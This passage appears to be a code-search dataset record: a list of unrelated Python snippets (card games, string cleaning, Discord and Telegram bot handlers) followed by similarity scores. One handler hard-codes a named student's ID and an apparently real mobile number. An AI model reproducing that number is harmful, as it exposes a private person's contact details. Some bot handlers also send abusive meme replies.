% (self.info.get('name', self.username))\n data['content'] = '🦄 已为您打卡成功!</br>最终打卡状态: %s</br>打卡时间 %s' \\\n % (self.status, datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n else:\n data['title'] = '[%s 同学] 打卡失败!' % (self.info.get('name', self.username))\n data['content'] = '❌ 打卡失败!请手动打卡~</br>最终打卡状态: %s</br>打卡时间 %s' \\\n % (self.status, datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n for msg_sender in self.msg_senders:\n try:\n status = msg_sender.send(data)\n if status:\n logger.info(\"%s %s send a hit card message to you, hit card status: %s\"\n % (self, msg_sender, self.status))\n else:\n logger.warning(\"%s %s failed to send a hit card message to you, hit card status: %s\"\n % (self, msg_sender, self.status))\n except Exception as e:\n logger.warning(\"%s %s failed to send a hit card message to you, hit card status: %s, Error msg: %s\"\n % (self, msg_sender, self.status, e))\n traceback.print_exc()", "def secret_char(c):\n return \"\\\\raisebox{{0.07ex}}{{{}}}\".format(c)", "def validCard(card):\n card = card.strip()\n #print(\"Card: \"+card)\n #print(\"Card in hex: \" + \":\".join(\"{:02x}\".format(ord(c)) for c in card))\n \n if re.fullmatch(\"[0-9]{10}\", card):\n return hashlib.sha1(card.encode(\"ascii\")).hexdigest()\n else:\n return None", "def filter_blanks(user, str):\n return re.sub(r'\\n{2}\\n+', '\\n', str)", "def ui_input() -> str:\n return input('Enter cards numbers(spaces needed): ')", "def cardholder_name(self):\n return self.__cardholder_name", "def __str__(self):\n card_str = ['-' * CARD_WIDTH]\n card_str.append('{} (Game {})'.format(self.name, self.game.number).center(CARD_WIDTH))\n card_str.append('-' * CARD_WIDTH)\n card_str.append(''.center(CARD_WIDTH))\n card_str.append('Money: {}'.format(self.money).center(CARD_WIDTH))\n card_str.append('Turnover: {}'.format(self.turnover).center(CARD_WIDTH))\n card_str.append(''.center(CARD_WIDTH))\n card_str.append('-' * CARD_WIDTH)\n return '\\n'.join('|{}|'.format(l) for l in card_str)", "def Send_newCards(self, cards): \n serialized = [c.serialize() for c in cards]\n self.Send({\"action\": \"newCards\", \"cards\": serialized})", "def get_card_str(self, card):\n card_str = str(card)\n if card == 11:\n card_str = \"Jack\"\n if card == 12:\n card_str = \"Queen\"\n if card == 13:\n card_str = \"King\"\n if card == 1:\n card_str = \"Ace\"\n \n return card_str", "def safety_command(update,context):\n update.message.reply_text('Quick safety instructions about the badge: \\r\\nThis device was designed and assembled by us and has not been certified by any standards. This means that, despite our efforts, the device might cause unintended damage to whomever operates the device or your surroundings.\\r\\nUse the product with care and responsibly. We are not liable for any damages which can occur while operating/using the device. This was mainly designed to play a supervised CTF.\\r\\nThe device only draws 5v of power, so there is no risk of electrocution. However, do not use a (non standard) USB power outlet with a higher voltage. If device produces abnormal heat or \\'magic smoke\\': remove the power and do not turn on again. We will be happy to send you a replacement.\\r\\nIf a short circuit occurs while running on batteries, the batteries will get hot. So:\\r\\n')\n time.sleep(1)\n update.message.reply_text('DO NOT LEAVE THE DEVICE TURNED ON UNATTENDED')\n time.sleep(1)\n update.message.reply_text('The circuitry is fully exposed and metal pins are sticking out from the device. 
We strongly recommend not to leave children play with the device unattended.')\n time.sleep(1)\n update.message.reply_text('If you have any questions about safety you can reach out to the team by email or via the TG chat accessible via /joingroup')", "def part(phenny, input):\n # Can only be done in privmsg by an admin\n if input.sender.startswith('#'): return\n if input.admin:\n phenny.write(['PART', input.group(2)])", "def ascii_version_of_hidden_card(*cards):\n\n return join_lines((HIDDEN_CARD, ascii_version_of_card(*cards[1:])))", "def accept_letter(self, key):\n letter = key.text()\n key.setEnabled(False)\n self.keyboard.set_focus('Space')\n return letter.lower()", "def for_description_enter_vlan_for_functional_testing_without_quotes(driver, description):\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Description\"]').clear()\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Description\"]').send_keys(description)", "async def fuckedd (abusehard):\n if not abusehard.text[0].isalpha() and abusehard.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n index = random.randint(0, len(memes.ABUSEHARD_STRING) - 1)\n reply_text = memes.ABUSEHARD_STRING[index]\n await abusehard.edit(reply_text)", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def __str__(self):\n result = ''\n for c in self._cards:\n result = result + str(c) + '\\n'\n return result", "def __str__(self):\n result = ''\n for c in self._cards:\n result = result + str(c) + '\\n'\n return result", "def testDeckStr(self):\n deckObj = Deck()\n tmpStr = 'As\\n2s\\n3s\\n4s\\n5s\\n6s\\n7s\\n8s\\n9s\\n10s\\nJs\\nQs\\nKs\\n\\\nAc\\n2c\\n3c\\n4c\\n5c\\n6c\\n7c\\n8c\\n9c\\n10c\\nJc\\nQc\\nKc\\nAh\\n\\\n2h\\n3h\\n4h\\n5h\\n6h\\n7h\\n8h\\n9h\\n10h\\nJh\\nQh\\nKh\\n\\\nAd\\n2d\\n3d\\n4d\\n5d\\n6d\\n7d\\n8d\\n9d\\n10d\\nJd\\nQd\\nKd\\n'\n self.assertEquals(tmpStr,str(deckObj))", "def wipe_empty_fields(card):\n cardB = []\n for field in card:\n if isinstance(field, basestring):\n field = field.strip()\n if field == '':\n field = None\n cardB.append(field)\n\n i = 0\n iMax = 0\n while i < len(card):\n if cardB[i] is not None:\n iMax = i\n i += 1\n return cardB[:iMax + 1]", "async def cry(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(random.choice(CRI))", "def prepare_response(response):\n response = clean_string(response)\n response += \"\\nYou: \"\n return response", "def clean_passphrase(self):\n data = self.cleaned_data[\"passphrase\"]\n words = data.split(\" \")\n if len(words) != mnemonic_len:\n raise ValidationError(\n \"Passphrase must have exactly %s words!\" % (mnemonic_len,)\n )\n return data", "async def cards_per_hand(ctx):\n message = NNB.cards_per_hand()\n await ctx.send(message)", "async def iasip_title_card(self, ctx: Context, *, title: str) -> None:\n\n async with ctx.channel.typing():\n if not title.startswith('\"'):\n title = '\"' + title\n\n if not title.endswith('\"'):\n title += '\"'\n\n buffer = await image_utils.title_card_generator(title)\n\n try:\n await ctx.send(file=discord.File(buffer, filename=\"iasip.png\"))\n except discord.HTTPException as e:\n bot_logger.error(f'File Send Failure. {e.status}. {e.text}')\n await ctx.send(f'Could not send image. 
Details: [Status {e.status} | {e.text}]')\n return", "def characters(self, data):\n pass", "def print_cards(cards):\r\n string = ''\r\n for c in cards:\r\n suit = c[0]\r\n if suit == 1:\r\n suit = \"\\u2665\" # heart\r\n elif suit == 2:\r\n suit = \"\\u2660\" # Spade\r\n elif suit == 3:\r\n suit = \"\\u2666\" # Diamond\r\n else:\r\n suit = \"\\u2663\" # club\r\n\r\n num = c[1]\r\n if num == 11:\r\n num = 'J'\r\n elif num == 12:\r\n num = 'Q'\r\n elif num == 13:\r\n num = 'K'\r\n else:\r\n num = str(num)\r\n\r\n string = string + num + suit + ' '\r\n return string", "async def fuckedd(abusehard):\n if not abusehard.text[0].isalpha() and abusehard.text[0] not in (\n \"/\",\n \"#\",\n \"@\",\n \"!\",\n ):\n index = random.randint(0, len(ABUSEHARD_STRING) - 1)\n reply_text = ABUSEHARD_STRING[index]\n await abusehard.edit(reply_text)", "def gokul(update, context):\n update.message.reply_text(\"\"\"GOKULAKRISHNAN-191MC126\n MOBILE-1234567890\"\"\")", "def DisplaySecretWord(Secret_Word):\n print(\"The Secret Word Is:\")\n Secret_Word_Masked = \"_ \" * len(Secret_Word)\n Secret_Word_Masked_Unspaced = \"-\" * len(Secret_Word)\n print(Secret_Word_Masked)\n \n return [Secret_Word_Masked, Secret_Word_Masked_Unspaced]", "def remove_space(user_inputs):\r\n return user_inputs.replace(\" \", \"\")", "def _cards_to_string(self, cards):\n return repr(self._eval.card2string(map(lambda x: x & 63, cards)))\\\n #.lower().replace(\"h\", u\"\\u2761\").replace(\"s\", u\"\\u2660\").replace(\"c\", u\"\\u2663\").replace(\"d\", u\"\\u2662\")", "def test_escape_semicolon(self):\n card = Card(\n \"mocking\",\n \"ˈmɑkɪŋ\",\n \"Making fun of someone or something in a cruel way; derisive.\",\n \"The ruthless scientist changed from mocking to sad.\",\n )\n\n expected = (\n \"The ruthless scientist changed from <b>mocking</b> to sad.; \"\n '\"<b>mocking /ˈmɑkɪŋ/</b><br> Making fun of someone or '\n 'something in a cruel way; derisive.\"'\n )\n\n self.assertEqual(card.to_anki_txt_format(), expected)", "def validUsername(name):\n if validCard(name):\n return False\n if ',' in name or \"?\" in name or \"=\" in name or \";\" in name or \"/\" in name or \"^\" in name or '\"' in name or '@' in name:\n return False\n if len(name) < 3:\n return False\n if \" \" in name:\n return False\n \n return True", "def chars_to_preserve(\n self,\n sentence: str,\n ) -> str:\n try:\n tokenized = re.findall(self.whitelist, sentence, re.IGNORECASE)\n return \" \".join(tokenized)\n except Exception as error:\n print(\n textwrap.dedent(\n f\"\"\"\n Bad characters range {self.whitelist},\n {error}\n \"\"\"\n )\n )\n raise", "def filtra(rut):\n caracteres = \"1234567890k\"\n rutx = \"\"\n for cambio in rut.lower():\n if cambio in caracteres:\n rutx += cambio\n return rutx", "def bala(update, context):\n update.message.reply_text(\"\"\"BALAKUMAR-191MC110\n MOBILE-8903220635\"\"\")", "def message(self, text):\n for char in text:\n if char == '\\n':\n self.cmd(0xC0) # next line\n else:\n self.cmd(ord(char),True)", "def message(self, text):\n for char in text:\n if char == '\\n':\n self.cmd(0xC0) # next line\n else:\n self.cmd(ord(char),True)", "def message(self, text):\n for char in text:\n if char == '\\n':\n self.cmd(0xC0) # next line\n else:\n self.cmd(ord(char),True)", "def on_sendButton_clicked(self):\n inputTxt = self.input.text()\n inputTxt += os.linesep\n \n if self.passwordCheckBox.isChecked():\n self.errors.insertPlainText(os.linesep)\n self.errors.ensureCursorVisible()\n else:\n self.errors.insertPlainText(inputTxt)\n 
self.errors.ensureCursorVisible()\n \n self.process.write(strToQByteArray(inputTxt))\n \n self.passwordCheckBox.setChecked(False)\n self.input.clear()", "def sendkey_escape(string):\r\n return re.sub(r'([+^%~{}\\[\\]()])', r'{\\1}', string)", "def strip_other_charcter():\n pass", "def _format_senders_correspondent_53D(self, val):\n account = val.get('ACCOUNT')\n name = val.get('NAME')\n address = val.get('ADDRESS')\n if name and address:\n name = FSwiftWriterUtils.split_text_and_prefix(name, 35)\n address = FSwiftWriterUtils.split_text_and_prefix(address, 35)\n val = FSwiftWriterUtils.allocate_space_for_name_address_without_constraint(name, address)\n if account:\n val = \"/\" + str(account) + \"\\n\" + str(val)\n return val", "def masked_word(self):\n for i in range(0,len(self._word)):\n if self._word[i] == ' ':\n self.new_string.append(' ')\n else:\n self.new_string.append('__ ')\n\n return self.print_new_word(self.new_string)", "def cards():\n if user_loggined():\n user = models.User.query.get(session['user_id'])\n u_cards = user.cards.all()\n prep_cards = []\n for card in u_cards:\n prep_cards.append(card.type + ' **** '+card.cnb[-9:])\n else:\n return redirect(url_for('index'))\n return redirect(url_for('index'))", "def removeSingleChars(self) -> None:\n self.text = re.sub('\\s[^\\n\\s]\\s', ' ', self.text)", "def clean_unnecessary_characters(self, tweet):\n tweet = tweet.lstrip(\"\\\"\").rstrip(\"\\\"\")\n tweet = re.sub(self.compiledAlphanumericRegex, ' ', tweet)\n tweet = tweet.replace('_', ' ')\n return tweet" ]
[ "0.57420164", "0.5617736", "0.55529416", "0.55403346", "0.54575396", "0.53695005", "0.5285843", "0.52102894", "0.51688284", "0.5163198", "0.51460236", "0.5135173", "0.5118663", "0.5107931", "0.50539863", "0.5050567", "0.50373065", "0.5022836", "0.5017234", "0.50094473", "0.4966692", "0.49313834", "0.4908603", "0.48998755", "0.48937395", "0.48881218", "0.48736793", "0.48726258", "0.48630086", "0.4851894", "0.4844652", "0.48367348", "0.483444", "0.48284423", "0.4815701", "0.48138064", "0.48122373", "0.48075613", "0.48046914", "0.48006523", "0.47845176", "0.47804433", "0.4778015", "0.47659323", "0.4765509", "0.47650805", "0.47620532", "0.4757588", "0.47548145", "0.47529116", "0.47491577", "0.47487205", "0.4741987", "0.4736869", "0.47366092", "0.47335646", "0.47330323", "0.47277707", "0.4723897", "0.47231776", "0.47199544", "0.4713009", "0.47091255", "0.47014803", "0.47009417", "0.46888056", "0.4687168", "0.46814144", "0.4680477", "0.46774885", "0.46774885", "0.46670255", "0.46667665", "0.46570525", "0.46492854", "0.46476924", "0.4646421", "0.4646172", "0.46405894", "0.4636169", "0.46309015", "0.46260098", "0.46199018", "0.4615192", "0.4614648", "0.46078297", "0.46074554", "0.46052572", "0.46051314", "0.4605073", "0.45985046", "0.45985046", "0.45985046", "0.45981157", "0.45965803", "0.45947805", "0.45875466", "0.45853993", "0.4584208", "0.45827752", "0.45784456" ]
0.0
-1
Send special characters in CardHolder
def test_33(self): assert 'False' == Api.requestBlock('test-33')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mecard(name, tel, email):\n return f'MECARD:N:{name};TEL:{tel};EMAIL:{email};'", "def display_content(com,message):\n #message = message.encode('utf-8')\n #message = message.decode('ascii', 'ignore')\n safeMsg = filter(lambda x: x in string.printable, message)\n safeMsg = safeMsg.replace('\\n', ' ')\n print \"ALPHA: \", safeMsg\n try:\n #com = serial.Serial(config.devalpha, 9600, timeout=3)\n #com.close()\n #com.open()\n comstr = config.alpha['display'] + safeMsg + config.alpha['eot']\n com.write(comstr)\n #com.close()\n except serial.SerialException as e:\n logging.warning(\"Serial exception: \"+str(e))", "def propeller_card(card):\n return card.as_html()", "def get21_str(in_dict):\n return \"\"\"BEGIN:VCARD\nVERSION:2.1\nN;ENCODING=QUOTED-PRINTABLE;CHARSET=UTF-8:;%s;;;\nTEL;VOICE;CELL:%s\nEND:VCARD\n\"\"\"%(quopri.encodestring(in_dict[\"name\"]), in_dict[\"tel\"])", "def _hackBotchedCard(self, card, res):\n\t\tmat = re.match(r\"([^\\s=]*)\\s*=\\s*([^/]+)\", card.cardimage)\n\t\tif mat:\n\t\t\tres[mat.group(1)] = mat.group(2).strip()\n\t\telse: # Card beyond recognition, ignore\n\t\t\tpass", "def secret_char(c):\n return \"\\\\raisebox{{0.07ex}}{{{}}}\".format(c)", "def card_html_id(card):\n return f'c{card:02d}'", "def encode(self, text):", "async def charinfo(self, ctx: Context, *, characters: str) -> None:\n match = re.match(r\"<(a?):(\\w+):(\\d+)>\", characters)\n if match:\n embed = Embed(\n title=\"Non-Character Detected\",\n description=\"Only unicode characters can be processed, but a custom Discord emoji \" \"was found. Please remove it and try again.\",\n )\n embed.colour = Color.red()\n await ctx.send(embed=embed)\n return\n\n if len(characters) > 25:\n embed = Embed(title=f\"Too many characters ({len(characters)}/25)\")\n embed.colour = Color.red()\n await ctx.send(embed=embed)\n return\n\n def get_info(char: str) -> Tuple[str, str]:\n digit = f\"{ord(char):x}\"\n if len(digit) <= 4:\n u_code = f\"\\\\u{digit:>04}\"\n else:\n u_code = f\"\\\\U{digit:>08}\"\n url = f\"https://www.compart.com/en/unicode/U+{digit:>04}\"\n name = f\"[{unicodedata.name(char, '')}]({url})\"\n info = f\"`{u_code.ljust(10)}`: {name} - {char}\"\n return info, u_code\n\n charlist, rawlist = zip(*(get_info(c) for c in characters))\n\n embed = Embed(description=\"\\n\".join(charlist))\n embed.set_author(name=\"Character Info\")\n\n if len(characters) > 1:\n embed.add_field(name=\"Raw\", value=f\"`{''.join(rawlist)}`\", inline=False)\n\n await ctx.send(embed=embed)", "def sendkey_escape(string):\r\n return re.sub(r'([+^%~{}\\[\\]()])', r'{\\1}', string)", "def test_specialchar(self):\n form_data = self.form_data('vNzwXpzKJyTshvHsuULn')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def characters(self, data):\n pass", "def _cards_to_string(self, cards):\n return repr(self._eval.card2string(map(lambda x: x & 63, cards)))\\\n #.lower().replace(\"h\", u\"\\u2761\").replace(\"s\", u\"\\u2660\").replace(\"c\", u\"\\u2663\").replace(\"d\", u\"\\u2662\")", "def testCardStr(self):\n cardObj = Card('A','d')\n self.assertEquals('Ad',str(cardObj))", "async def encode(ctx, text: Option(str, \"Text to encode in brainfuck\")):\n encoded = bot.brainfuck.encode(text)\n await send_code(ctx, encoded.code, lang=\"bf\")", "def test_create_material_special_chars(self):\n expected_materials = [\n ['cotton', 'žvýkačky'],\n ['cotton', 'žvýkačky'],\n ['wool', 'žvýkačky'],\n ]\n\n select_listings_to_edit(self.driver)\n d = self.driver\n bp = BulkPage(d)\n\n 
send_keys(bp.operation_input(), 'žvýkačky')\n click(bp.operation_apply())\n\n material_names = bp.material_names()\n assert material_names == expected_materials\n\n send_keys(bp.operation_input(), 'me@site')\n err = bp.error_baloon()\n assert err == \"Materials can only include spaces, letters, and numbers.\"", "def sendingString(self):\n return ''", "def test_value_special_chars(self):\n raw = [\n 0x48,\n 0x65,\n 0x79,\n 0x21,\n 0x3F,\n 0x24,\n 0x20,\n 0xC4,\n 0xD6,\n 0xDC,\n 0xE4,\n 0xF6,\n 0xFC,\n 0xDF,\n ]\n string = \"Hey!?$ ÄÖÜäöüß\"\n self.assertEqual(DPTString.to_knx(string), raw)\n self.assertEqual(DPTString.from_knx(raw), string)", "async def fivedollar(self, ctx):\n await ctx.message.edit(content=\"[̲̅$̲̅(̲̅5̲̅)̲̅$̲̅]\")", "def card_factory(value: str, base: str, is_hidden: bool = False) -> str:\n if 1 <= len(value) <= 2:\n card = list(base)\n card[13:15] = f\"{value} \" if len(value) == 1 else f\"{value}\"\n card[74:76] = f\" {value}\" if len(value) == 1 else f\"{value}\"\n else:\n raise Exception(\"Invalid value lenght. Must be 1 or 2 charaters\")\n\n return hidden_face if is_hidden else \"\".join(card)", "def escape_character_in_string(self, a, text):\n logging.debug(\"in escape character \" + text)\n #self.just_read_char()\n self.read_char()\n self.produce(STRING, text)", "async def badman(self, ctx):\n await ctx.message.edit(content=\"̿̿ ̿̿ ̿̿ ̿'̿'\\̵͇̿̿\\з= ( ▀ ͜͞ʖ▀) =ε/̵͇̿̿/’̿’̿ ̿ ̿̿ ̿̿ ̿̿\")", "def test_special_characters_business_name(self):\n user = \"chairman\"\n msg = self.business_item_class.create_business(\"Ma@en_deleo\", user, \"soft*%ware\", \"nairo@&\")\n print(msg)\n self.assertEqual(msg, {\"message\":\"Business name should not contain special characters\"})", "def post_key(self):\n # print(self.key)\n #Sending the key to the attacker.\n s.send(bytes(\"K\\n{}\".format(str(self.key,'utf-8')),'utf-8'))", "def __str__(self):\n return self.card_no", "def send_msgs(self, submit_success):\n data = {}\n if submit_success:\n data['title'] = '[%s 同学] 打卡成功!' % (self.info.get('name', self.username))\n data['content'] = '🦄 已为您打卡成功!</br>最终打卡状态: %s</br>打卡时间 %s' \\\n % (self.status, datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n else:\n data['title'] = '[%s 同学] 打卡失败!' 
% (self.info.get('name', self.username))\n data['content'] = '❌ 打卡失败!请手动打卡~</br>最终打卡状态: %s</br>打卡时间 %s' \\\n % (self.status, datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n for msg_sender in self.msg_senders:\n try:\n status = msg_sender.send(data)\n if status:\n logger.info(\"%s %s send a hit card message to you, hit card status: %s\"\n % (self, msg_sender, self.status))\n else:\n logger.warning(\"%s %s failed to send a hit card message to you, hit card status: %s\"\n % (self, msg_sender, self.status))\n except Exception as e:\n logger.warning(\"%s %s failed to send a hit card message to you, hit card status: %s, Error msg: %s\"\n % (self, msg_sender, self.status, e))\n traceback.print_exc()", "def get_char_echo(self) -> str:\n ...", "def set_card_simple(self, title, content):\n self.response.card.type = 'Simple'\n self.response.card.title = title\n self.response.card.content = content", "def __init__(self, char_name, char_description):\r\n super().__init__(char_name, char_description)\r\n self.gift = None\r\n self.gift_conversation = None", "def sendInstruction(self, instruction):\n # instruction = '!'\n print(f'Sending: {instruction}')\n self.ser.write(instruction.encode(\"ascii\"))\n self.ser.write('\\n'.encode(\"ascii\"))\n\n self.ser.reset_input_buffer()\n\n ser_bytes = self.ser.read(1)\n print(f'Receiving\\nraw data: {ser_bytes}')\n\n # decoded_bytes = (ser_bytes.decode(\"ascii\"))\n # print(f'Ascii Value: {decoded_bytes}', flush=True)", "async def deliver_card(list_of_lists: List[List[str]]) -> str:\n\n final_string = []\n for sublist in list_of_lists:\n final_string.append('\\u200A'.join(sublist))\n\n # add blank emoji to first line to accommodate compact mode w/o resizing emojis\n return '<:blank:589560784485613570>\\n' + '\\n'.join(final_string)", "def wepbuy(self):\n\t\tthismsg = \"\\r\\n\"+self.ESC+\"14C\"+self.ESC+\"1;34m\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.ESC+\"0;34m\"+self.A220+self.ESC+\"1m\"+self.A220+self.A220+self.A220+self.A220+self.ESC+\"0;34m\"+self.A220+self.ESC+\"1m\"+self.A220+self.ESC+\"0;34m\"+self.A220+self.A220+self.ESC+\"1m\"+self.A220+self.ESC+\"0;34m\"+self.A220+self.ESC+\"1m\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"46m\"+self.A178+self.ESC+\"40m\"+self.A223+self.ESC+\"2C\"+self.ESC+\"37m The\"+self.ESC+\"CSaga\"+self.ESC+\"Cof\"+self.ESC+\"Cthe\"+self.ESC+\"CRed\"+self.ESC+\"CDragon\"+self.ESC+\"C-\"+self.ESC+\"C\"+self.ESC+\"34mWeapons\"+self.ESC+\"CList \"+self.ESC+\"C\"+self.A220+self.ESC+\"46m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += 
self.ESC+\"14C\"+self.ESC+\"46m\"+self.A178+self.ESC+\"44m\"+self.A219+self.ESC+\"40m\"+self.A223+self.A223+self.A223+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;34m\"+self.A223+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.ESC+\"46m\"+self.A178+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"46m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"0;36mWeapons\"+self.ESC+\"27CPrice\"+self.ESC+\"7C\"+self.ESC+\"1;34;44m\"+self.A219+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"40m1.\"+self.ESC+\"CStick\"+self.ESC+\"0;34m..................................\"+self.ESC+\"36m200\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A219+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"40m2.\"+self.ESC+\"CDagger\"+self.ESC+\"0;34m...............................\"+self.ESC+\"36m1,000\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A219+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A178+self.ESC+\"2C\"+self.ESC+\"40m3.\"+self.ESC+\"CShort\"+self.ESC+\"CSword\"+self.ESC+\"0;34m..........................\"+self.ESC+\"36m3,000\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A177+self.ESC+\"2C\"+self.ESC+\"40m4.\"+self.ESC+\"CLong\"+self.ESC+\"CSword\"+self.ESC+\"0;34m..........................\"+self.ESC+\"36m10,000\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A177+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A176+self.ESC+\"2C\"+self.ESC+\"40m5.\"+self.ESC+\"CHuge\"+self.ESC+\"CAxe\"+self.ESC+\"0;34m............................\"+self.ESC+\"36m30,000\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"0;34m\"+self.A223+self.ESC+\"2C\"+self.ESC+\"1m6.\"+self.ESC+\"CBone\"+self.ESC+\"CCruncher\"+self.ESC+\"0;34m......................\"+self.ESC+\"36m100,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A223+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A176+self.ESC+\"2C\"+self.ESC+\"1m7.\"+self.ESC+\"CTwin\"+self.ESC+\"CSwords\"+self.ESC+\"0;34m........................\"+self.ESC+\"36m150,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A176+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A177+self.ESC+\"2C\"+self.ESC+\"1m8.\"+self.ESC+\"CPower\"+self.ESC+\"CAxe\"+self.ESC+\"0;34m..........................\"+self.ESC+\"36m200,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A177+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A178+self.ESC+\"2C\"+self.ESC+\"1m9.\"+self.ESC+\"CAble's\"+self.ESC+\"CSword\"+self.ESC+\"0;34m.......................\"+self.ESC+\"36m400,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A178+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A219+self.ESC+\"C\"+self.ESC+\"1m10.\"+self.ESC+\"CWan's\"+self.ESC+\"CWeapon\"+self.ESC+\"0;34m.....................\"+self.ESC+\"36m1,000,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += 
self.ESC+\"14C\"+self.A223+self.ESC+\"C\"+self.ESC+\"1m11.\"+self.ESC+\"CSpear\"+self.ESC+\"COf\"+self.ESC+\"CGold\"+self.ESC+\"0;34m....................\"+self.ESC+\"36m4,000,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A219+self.ESC+\"C\"+self.ESC+\"1m12.\"+self.ESC+\"CCrystal\"+self.ESC+\"CShard\"+self.ESC+\"0;34m...................\"+self.ESC+\"36m10,000,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A219+self.ESC+\"C\"+self.ESC+\"1m13.\"+self.ESC+\"CNiras's\"+self.ESC+\"CTeeth\"+self.ESC+\"0;34m...................\"+self.ESC+\"36m40,000,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A219+self.ESC+\"C\"+self.ESC+\"1m14.\"+self.ESC+\"CBlood\"+self.ESC+\"CSword\"+self.ESC+\"0;34m....................\"+self.ESC+\"36m100,000,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A219+self.ESC+\"C\"+self.ESC+\"1m15.\"+self.ESC+\"CDeath\"+self.ESC+\"CSword\"+self.ESC+\"0;34m....................\"+self.ESC+\"36m400,000,000\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A176+self.ESC+\"0;34m\"+self.A219+self.A220+self.A220+self.A220+self.A220+self.A220+self.A178+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A178+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A176+self.ESC+\"C\"+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A220+self.A220+self.A176+self.A220+self.A220+self.A219+self.ESC+\"1;44m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"0m\\r\\n\";\n\t\treturn thismsg", "def send_text(self, data: str) -> None:", "def card_string(card):\n article = \"\"\n if card.face == 'Ace':\n article = \"an \"\n elif card.face in ['Jack', 'Queen', 'King']:\n article = \"a \"\n return article + card.face + \" of \" + card.suit", "def deal_card(self, player: BaseBlackjackPlayer, is_open: bool = True) -> str:\n card = self.deck.pick_card(discard=True, is_open=is_open)\n player.hand.cards.append(card)\n return f\"\\n{player.username} received {card}. Total is: {player.hand.value}\"", "async def charinfo(self, ctx: Context, *, characters: str) -> None:\n match = re.match(r\"<(a?):(\\w+):(\\d+)>\", characters)\n if match:\n await messages.send_denial(\n ctx,\n \"**Non-Character 